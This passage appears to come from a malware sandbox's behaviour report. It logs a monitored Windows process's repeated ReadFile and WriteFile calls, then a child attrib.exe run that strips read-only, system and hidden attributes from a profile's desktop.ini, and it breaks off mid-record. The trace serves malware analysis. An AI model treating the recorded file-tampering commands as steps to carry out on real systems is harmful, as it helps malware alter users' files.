lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.995] GetFileType (hFile=0x4c) returned 0x1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.995] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.995] GetFileType (hFile=0x4c) returned 0x1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.995] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.995] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0210.995] GetFileType (hFile=0x4c) returned 0x1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.995] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0210.995] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.995] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0210.995] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.995] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.995] GetFileType (hFile=0x4c) returned 0x1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] GetFileType (hFile=0x4c) returned 0x1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] GetFileType (hFile=0x4c) returned 0x1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] GetFileType (hFile=0x4c) returned 0x1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] GetFileType (hFile=0x4c) returned 0x1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] GetFileType (hFile=0x4c) returned 0x1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] GetFileType (hFile=0x4c) returned 0x1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] GetFileType (hFile=0x4c) returned 0x1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0210.997] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.997] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0210.997] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.997] ReadFile 
(in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] GetFileType (hFile=0x4c) returned 0x1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] GetFileType (hFile=0x4c) returned 0x1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] GetFileType (hFile=0x4c) returned 0x1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] GetFileType (hFile=0x4c) returned 0x1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] GetFileType (hFile=0x4c) returned 0x1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] GetFileType (hFile=0x4c) returned 0x1 [0210.998] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0210.998] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.998] GetFileType (hFile=0x4c) returned 0x1 [0210.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.998] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.998] GetFileType (hFile=0x4c) returned 0x1 [0210.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.998] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0210.998] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.998] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0210.998] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.998] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0210.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.998] GetFileType (hFile=0x4c) returned 0x1 [0210.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.998] GetFileType (hFile=0x4c) returned 0x1 [0210.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.998] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, 
lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.998] GetFileType (hFile=0x4c) returned 0x1 [0210.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.998] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.999] GetFileType (hFile=0x4c) returned 0x1 [0210.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.999] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.999] GetFileType (hFile=0x4c) returned 0x1 [0210.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.999] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.999] GetFileType (hFile=0x4c) returned 0x1 [0210.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.999] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.999] GetFileType (hFile=0x4c) returned 0x1 [0210.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.999] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, 
lpOverlapped=0x0) returned 1 [0210.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.999] GetFileType (hFile=0x4c) returned 0x1 [0210.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.999] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0210.999] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.999] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0210.999] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.999] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0211.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.000] GetFileType (hFile=0x4c) returned 0x1 [0211.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.000] GetFileType (hFile=0x4c) returned 0x1 [0211.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.000] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.000] GetFileType (hFile=0x4c) returned 0x1 [0211.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.000] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.052] GetFileType (hFile=0x4c) returned 0x1 [0211.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.052] WriteFile (in: hFile=0x4c, 
lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.052] GetFileType (hFile=0x4c) returned 0x1 [0211.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.052] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.052] GetFileType (hFile=0x4c) returned 0x1 [0211.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.052] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.052] GetFileType (hFile=0x4c) returned 0x1 [0211.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.052] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.052] GetFileType (hFile=0x4c) returned 0x1 [0211.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.052] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0211.053] _get_osfhandle (_FileHandle=4) returned 0x54 [0211.053] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0211.053] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0211.053] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] GetFileType (hFile=0x4c) returned 0x1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] GetFileType (hFile=0x4c) returned 0x1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] GetFileType (hFile=0x4c) returned 0x1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] GetFileType (hFile=0x4c) returned 0x1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] GetFileType (hFile=0x4c) returned 0x1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] 
GetFileType (hFile=0x4c) returned 0x1 [0211.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.053] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] GetFileType (hFile=0x4c) returned 0x1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] GetFileType (hFile=0x4c) returned 0x1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0211.054] _get_osfhandle (_FileHandle=4) returned 0x54 [0211.054] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0211.054] _get_osfhandle (_FileHandle=4) returned 0x54 [0211.054] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] GetFileType (hFile=0x4c) returned 0x1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] GetFileType (hFile=0x4c) returned 0x1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | 
out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] GetFileType (hFile=0x4c) returned 0x1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] GetFileType (hFile=0x4c) returned 0x1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] GetFileType (hFile=0x4c) returned 0x1 [0211.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.054] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.055] GetFileType (hFile=0x4c) returned 0x1 [0211.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.055] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.055] GetFileType (hFile=0x4c) returned 0x1 [0211.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.055] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, 
lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0211.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.055] GetFileType (hFile=0x4c) returned 0x1 [0211.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.055] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0211.055] _get_osfhandle (_FileHandle=4) returned 0x54 [0211.055] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0211.055] _get_osfhandle (_FileHandle=4) returned 0x54 [0211.055] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x32, lpOverlapped=0x0) returned 1 [0211.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.055] GetFileType (hFile=0x4c) returned 0x1 [0211.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.055] GetFileType (hFile=0x4c) returned 0x1 [0211.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0211.055] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x32, lpOverlapped=0x0) returned 1 [0211.055] _get_osfhandle (_FileHandle=4) returned 0x54 [0211.055] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0211.055] _close (_FileHandle=4) returned 0 [0211.055] FindNextFileW (in: hFindFile=0x2b0e70, lpFindFileData=0x22f21c | out: lpFindFileData=0x22f21c) returned 0 [0211.056] GetLastError () returned 0x12 [0211.056] FindClose (in: hFindFile=0x2b0e70 | out: hFindFile=0x2b0e70) returned 1 [0211.056] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 
0 [0211.056] _close (_FileHandle=3) returned 0 [0211.057] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.057] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0211.057] _get_osfhandle (_FileHandle=1) returned 0x7 [0211.057] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0211.057] _get_osfhandle (_FileHandle=0) returned 0x3 [0211.057] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0211.057] SetConsoleInputExeNameW () returned 0x1 [0211.057] GetConsoleOutputCP () returned 0x1b5 [0211.057] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0211.057] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.057] exit (_Code=0) Process: id = "515" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16940" os_pid = "0x974" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "512" os_parent_pid = "0x9ac" cmd_line = "attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\Links\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31082 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31083 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = 